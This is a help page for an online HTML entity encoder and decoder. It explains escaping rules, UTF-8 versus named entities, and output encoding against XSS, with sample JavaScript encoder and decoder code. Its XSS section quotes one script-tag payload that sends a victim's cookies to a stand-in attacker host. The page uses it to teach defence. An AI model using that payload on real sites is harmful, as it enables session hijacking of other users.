HTML Entity
Encode special characters to HTML entities and decode them back. Supports essential escaping, extended named entities, and numeric references — all in your browser.
<h1>Hello & “World”</h1>
Why use our online HTML Entity?
Escape or unescape HTML special characters (& < > ' ") instantly in your browser. Essential for preventing XSS, embedding HTML in JSON, or preparing content for email templates.
How to use HTML Entity
1. Choose Encode or Decode: select the Encode tab to convert plain text to HTML entities, or the Decode tab to convert entity-encoded HTML back to readable text.
2. Paste or type your input: enter your text in the input panel. The output updates instantly as you type.
3. Select an encode mode (Encode tab only): choose Essential to encode only the five critical characters (& < > " '), or Extended to encode all named HTML entities and any remaining non-ASCII characters as numeric references.
4. Copy or swap the result: click Copy to copy the output to your clipboard. Use the Swap button to send the encoded output straight into the Decode tab for round-trip verification.
The five characters you must always escape in HTML
Five characters have special meaning in HTML and must be encoded as entities when they appear as literal text content or in attribute values.
& (ampersand) must always be encoded as &amp;. An unescaped ampersand can be interpreted as the start of an entity reference, potentially corrupting nearby text or triggering parse errors.
< (less-than) must be encoded as &lt;. An unescaped < is interpreted as the start of an HTML tag, which can break the page layout or, in the worst case, inject script tags: a Cross-Site Scripting (XSS) vulnerability.
> (greater-than) should be encoded as &gt;. While browsers are more tolerant of an unescaped > in text content, it is required in some contexts (notably XHTML) and is good practice universally.
" (double quote) must be encoded as &quot; when it appears inside a double-quoted HTML attribute: <div class="my"class"> would break the attribute. Inside a single-quoted attribute, it is safe unescaped.
' (apostrophe/single quote) should be encoded as &#39; or &apos; when it appears inside a single-quoted attribute. Inside a double-quoted attribute, it is safe. In HTML5 content, it is safe unescaped, but encoding it prevents issues in XML/XHTML.
HTML entities vs Unicode — which to use
Modern HTML pages served with UTF-8 encoding (the universal standard) can include any Unicode character directly in the source — no entity encoding required for accented letters, symbols, or emoji. Characters like é, ©, €, and 😀 can appear literally in UTF-8 HTML and will render correctly in all modern browsers.
Named HTML entities like &copy;, &reg;, &euro;, and &mdash; date from an era when web pages were not reliably served in a consistent encoding. In the early web, a document might be ASCII, ISO-8859-1, or Windows-1252 depending on the server configuration. Entities provided a way to include characters outside the basic ASCII range reliably, because entities are plain ASCII themselves.
Today, the pragmatic guidance is: always use UTF-8 (declare it with <meta charset="UTF-8"> in the <head>), include the characters you need literally in the source, and only use entities for the five special HTML characters (&, <, >, ", '). Using &copy; instead of © is harmless but unnecessary. Using named entities for every special character makes HTML source harder to read and write.
HTML entity encoding and XSS prevention
Cross-Site Scripting (XSS) is one of the most common and damaging web vulnerabilities. An XSS attack occurs when an attacker injects malicious script code into a page that is then executed in other users' browsers. The most common vector: user-supplied text (names, comments, search queries) is inserted into HTML without encoding.
If a search page displays <p>Results for: [unescaped user input]</p>, an attacker can search for <script>document.location='https://evil.com?cookie='+document.cookie</script> and steal session cookies from anyone who sees the resulting page. HTML entity encoding the user input, converting < to &lt; and > to &gt;, renders the script as harmless literal text.
The correct defense is output encoding: apply HTML entity encoding at the moment you insert data into an HTML context. Different contexts require different encoding: HTML entity encoding for HTML content, JavaScript string encoding for inline JavaScript, URL percent-encoding for URL parameters. Modern templating engines (React JSX, Jinja2, Handlebars) apply HTML encoding automatically by default — the risk comes from explicitly bypassing the auto-escaping with raw/unsafe/dangerouslySetInnerHTML patterns.
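The output-encoding step described above, as an added example written for this page rather than taken from the tool's own source. It implements the two encode modes the tool offers (Essential and Extended, where non-ASCII becomes hex numeric references) and renders the search-results snippet from the text with the untrusted value encoded at the point of insertion.

```javascript
// Added example (not the tool's own code): HTML entity encoding as output
// encoding for an HTML text or attribute context.
const ESSENTIAL = {
  "&": "&amp;",
  "<": "&lt;",
  ">": "&gt;",
  '"': "&quot;",
  "'": "&#39;",
};

// Essential mode: encode only the five characters that carry meaning in HTML.
// All five are handled in one pass; running the encoder twice over the same
// text would double-encode, turning "&amp;" into "&amp;amp;".
function encodeEssential(text) {
  return text.replace(/[&<>"']/g, (ch) => ESSENTIAL[ch]);
}

// Extended mode: essential escaping plus every non-ASCII code point as a
// hexadecimal numeric reference. for...of iterates by code point, so an
// emoji becomes a single reference rather than two surrogate halves.
function encodeExtended(text) {
  let out = "";
  for (const ch of encodeEssential(text)) {
    const cp = ch.codePointAt(0);
    out += cp >= 0x80 ? `&#x${cp.toString(16).toUpperCase()};` : ch;
  }
  return out;
}

// The search-results page from the text: the untrusted query is encoded at
// the moment it enters the HTML context, not earlier and not later.
function renderResults(userQuery) {
  return `<p>Results for: ${encodeEssential(userQuery)}</p>`;
}

// Constructed input shaped like the injection attempt discussed above.
console.log(renderResults("<script>x()</script>"));
// → <p>Results for: &lt;script&gt;x()&lt;/script&gt;</p>
console.log(encodeExtended("Hello & \u201CWorld\u201D"));
// → Hello &amp; &#x201C;World&#x201D;
```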
Frequently Asked Questions
What is the difference between Essential and Extended encode modes?
- Essential mode encodes only the five characters that must be escaped in HTML: & (→ &amp;), < (→ &lt;), > (→ &gt;), " (→ &quot;), and ' (→ &#39;). Extended mode additionally encodes all characters that have a named HTML entity, such as © (&copy;), € (&euro;), Greek letters, math symbols, and accented Latin characters.
What entity formats can the Decoder handle?
- The decoder handles all three entity formats: named references (&amp; &copy; &mdash;), decimal numeric references (&#169; &#8212;), and hexadecimal numeric references (&#xA9; &#x2014;).
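A decoder for the three reference formats listed above, added here as an example and not the tool's own implementation. The named-entity table is a small constructed subset of the HTML5 list; unknown names and out-of-range code points are left as written rather than guessed at.

```javascript
// Added example (not the tool's own code): decoding named, decimal and
// hexadecimal character references in a single pass.
const NAMED = {
  amp: "&", lt: "<", gt: ">", quot: '"', apos: "'",
  copy: "\u00A9", reg: "\u00AE", euro: "\u20AC", mdash: "\u2014", nbsp: "\u00A0",
};

// One pattern covers &#xA9; (hex), &#169; (decimal) and &copy; (named).
// The semicolon is required; legacy semicolon-less forms are not handled.
const ENTITY_RE = /&(?:#x([0-9a-f]+)|#([0-9]+)|([a-z][a-z0-9]*));/gi;

function decodeEntities(text) {
  return text.replace(ENTITY_RE, (match, hex, dec, name) => {
    if (name !== undefined) {
      // Entity names are case-sensitive, so the lookup is exact.
      return Object.prototype.hasOwnProperty.call(NAMED, name) ? NAMED[name] : match;
    }
    const cp = hex !== undefined ? parseInt(hex, 16) : parseInt(dec, 10);
    // Reject code points beyond U+10FFFF or in the surrogate range. The HTML
    // spec substitutes U+FFFD; keeping the reference visible is the more
    // conservative behaviour for a diagnostic tool.
    if (cp > 0x10ffff || (cp >= 0xd800 && cp <= 0xdfff)) return match;
    return String.fromCodePoint(cp);
  });
}

// Single-pass decoding means "&amp;lt;" becomes "&lt;", not "<": the output
// of one decode is never fed back into the pattern, so nested encodings are
// peeled one layer at a time instead of collapsing unexpectedly.
console.log(decodeEntities("&lt;h1&gt;Hello &amp; &#8220;World&#8221;&lt;/h1&gt;"));
// → <h1>Hello & “World”</h1>
```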
Does my text get sent to a server?
- No. All encoding and decoding runs entirely in your browser using JavaScript string processing. Your text is never transmitted to any server.
Why do I need to encode HTML entities?
- Characters like <, >, and & have special meaning in HTML. If they appear unescaped in page content or attributes, the browser may misinterpret them as markup, causing layout breaks or security vulnerabilities such as cross-site scripting (XSS). Encoding them as entities ensures they display correctly as literal characters.